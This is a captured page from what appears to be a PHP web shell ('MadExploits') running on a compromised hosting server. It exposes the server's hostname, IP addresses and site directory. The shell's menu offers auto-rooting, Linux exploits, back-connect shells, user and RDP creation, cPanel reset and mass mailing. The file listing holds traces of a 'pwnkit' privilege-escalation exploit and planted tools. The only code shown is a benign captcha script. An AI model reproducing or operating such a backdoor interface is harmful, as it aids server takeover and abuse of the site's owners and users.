Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.220
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
omxrelocation /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
ajax-load
[ DIR ]
drwxr-xr-x
application
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
maildoc
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
session_sv
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
.htaccess
0
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
captcha.php
733
B
-rw-r--r--
franchise-mail.php
14.84
KB
-rw-r--r--
google7240abc2ef2007ee.html
0
B
-rw-r--r--
index.php
10.44
KB
-rw-r--r--
mail.php
42.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
quickmail.php
15.87
KB
-rw-r--r--
robots.txt
162
B
-rw-r--r--
ror.xml
71.47
KB
-rw-r--r--
sitemap.xml
513
B
-rw-r--r--
urllist.txt
8.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : captcha.php
<?php session_start(); $length = 6; // Number of characters in the captcha $captchaString = substr(str_shuffle("2345678ABCDEFGHIJKLMNPQRSTUVWXYZ"), 0, $length); $_SESSION['captcha'] = $captchaString; // Set the content type for the image header('Content-type: image/png'); // Create an image with a white background $image = imagecreatetruecolor(90, 35); $bgColor = imagecolorallocate($image, 203, 200, 195); imagefill($image, 0, 0, $bgColor); // Add the captcha text in black color $textColor = imagecolorallocate($image, 0, 0, 0); imagettftext($image, 20, 10, 7, 30, $textColor, 'fonts/captcha.ttf', $captchaString); // Output the image imagepng($image); // Free up memory imagedestroy($image); ?>
Close